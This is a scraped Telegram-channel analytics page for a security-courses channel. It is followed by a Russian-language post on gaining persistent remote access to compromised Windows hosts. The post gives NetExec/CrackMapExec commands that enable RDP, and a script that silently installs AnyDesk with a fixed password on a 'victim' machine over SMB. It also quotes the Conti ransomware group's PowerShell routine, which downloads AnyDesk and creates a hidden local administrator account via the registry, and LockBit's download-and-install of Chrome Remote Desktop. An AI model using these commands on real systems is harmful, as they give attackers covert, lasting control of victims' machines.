All Security Engineering Courses
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Show more📈 Analytical overview of Telegram channel All Security Engineering Courses
Channel All Security Engineering Courses (@allsecurityengineeringcourses) in the English language segment is an active participant. Currently, the community unites 18 795 subscribers, ranking 7 164 in the Technologies & Applications category and 35 971 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 18 795 subscribers.
According to the latest data from 14 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 122 over the last 30 days and by 3 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 10.56%. Within the first 24 hours after publication, content typically collects 3.00% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 985 views. Within the first day, a publication typically gains 563 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 2.
- Thematic interests: Content is focused on key topics such as git, strace, github, linux, docker.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Thanks to the high frequency of updates (latest data received on 15 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
nxc smb 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=smb
nxc wmi 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=wmi
# опционально добавляем себя в Remote Desktop Users
Однако для совершения этой операции потребуются права админа, а они есть далеко не всегда, поэтому мы можем посмотреть в сторону VNC, например, POC vncdll.
Впрочем, иногда смотрят в сторону AnyDesk. Для развертывания есть скрипт-ванлайнер:
# deploy.cmd
C:\Users\victim\AppData\Local\Temp\anydesk.exe --install C:\Users\victim\AppData\Local\AnyDesk --start-with-win --silent
del C:\Users\victim\AppData\Local\Temp\anydesk.exe
echo Passw0rd! | C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --set-password
for /f "delims=" %i in ('C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i
# Запускаем скрипт
cme smb 192.168.0.1 -u victim -p 'Passw0rd!' -x deploy.cmd
Этим способом любит пользоваться Conti, они разворачивают вот так:
Function AnyDesk {
mkdir "C:\ProgramData\AnyDesk"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}
AnyDesk
А их коллеги — LockBit — разворачивают Google Chrome Remote Desktop:
# Download from Google
powershell -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi')
# Install
msiexec /i C:\\ProgramData\\1.msi
Наконец, в нашем небольшом чатике коллеги накидали иные варианты:
- https://rustdesk.com/ ;
- https://www.supremocontrol.com/ ;
- https://www.n-able.com/products/n-sight-rmm ;
- https://github.com/miroslavpejic85/p2p ;
- https://github.com/ps1337/reinschauer .
Available now! Telegram Research 2025 — the year's key insights 
